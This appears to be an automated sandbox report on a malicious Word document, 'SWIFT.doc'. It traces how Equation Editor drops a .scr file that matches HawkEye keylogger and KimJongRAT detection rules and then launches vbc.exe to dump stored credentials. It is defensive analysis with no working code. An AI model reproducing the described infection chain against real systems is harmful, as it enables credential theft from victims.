Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00242358
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002413E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002404E8
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024A528
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024DE98
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024703A
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00247048
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002450EA
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002458F9
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024D8CA
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00245908
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00248998
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002469C8
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002469D8
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00244238
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00244248
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024D2B0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024329E
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002482E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00245B09
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024CB40
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00246B93
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002454A0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00245490
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00244DE0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00241DF2
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00244DD0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002456B0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002476F9
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002456C0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00247708
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B0048
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005BC174
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B5168
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005BDB42
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B8498
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005BD5F8
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005BF728
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B5FB0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B0FA0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B8858
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005BD0B7
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005BD112
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B7A28
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B4C10
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B155E
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B1542
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005BCD41
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B152D
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B7608
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B6EED
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B6EA5
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005B0FF8
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0060D990
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0060AFB0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00606408
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_006010A2
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_006010A8
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_006059E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_006059D0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_006056A8
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0060A3E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_006063F8
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00606FC8
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00606FB9
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00B11400
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00B10A50
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00B103AD
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00B1319D
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00B113FE
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00B10FE0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00B10FD0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00B11F10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00404DE5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00404E56
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00404EC7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00404F58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_0040BF6B

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: String function: 00412084 appears 39 times

Source: 00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 9.2.izux978537.scr.2c0000.0.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 9.2.izux978537.scr.2c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE	Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload

Source: 9.2.izux978537.scr.400000.1.unpack, u202d????????????????????????????????????????.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.izux978537.scr.400000.1.unpack, u202d????????????????????????????????????????.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 9.2.izux978537.scr.400000.1.unpack, u200b????????????????????????????????????????.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs	Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs	Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs	Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 9.2.izux978537.scr.400000.1.unpack, u200d????????????????????????????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 9.2.izux978537.scr.400000.1.unpack, u200d????????????????????????????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@13/9@1/1

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_0040F37C FindResourceA,SizeofResource,LoadResource,LockResource,

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$SWIFT.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\izux978537.scr

Mutant created: \Sessions\1\BaseNamedObjects\ae5d6307-0d62-4e92-938b-debeac1db00e

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD519.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Roaming\izux978537.scr

WMI Queries: IWbemServices::ExecQuery - SELECT ProcessorId FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\izux978537.scr

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SWIFT.doc	Virustotal: Detection: 44%
Source: SWIFT.doc	ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: unknown	Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2915.tmp'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2916.tmp'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2915.tmp'
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2916.tmp'

Source: C:\Users\user\AppData\Roaming\izux978537.scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\izux978537.scr

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: SWIFT.doc

Static file information: File size 1258700 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:

Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: izux978537.scr, 00000009.00000002.2378186428.0000000002D68000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs

.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_00404841 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024A0D2 pushad ; ret
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024F198 push edi; retf
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024BAB0 pushad ; iretd
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024A480 push esp; retf 001Ah
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024EDAB push FFD2B0BAh; retf
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_005BA600 push ebx; ret
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0060747C push esp; retf
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00412341 push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00412360 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00412360 push eax; ret

Persistence and Installation Behavior:

Drops PE files with a suspicious file extension

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\izux978537.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hktestfile[1].scr			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\izux978537.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hktestfile[1].scr			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_0040FCBC memset,strcpy,memset,strcpy,strcat,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
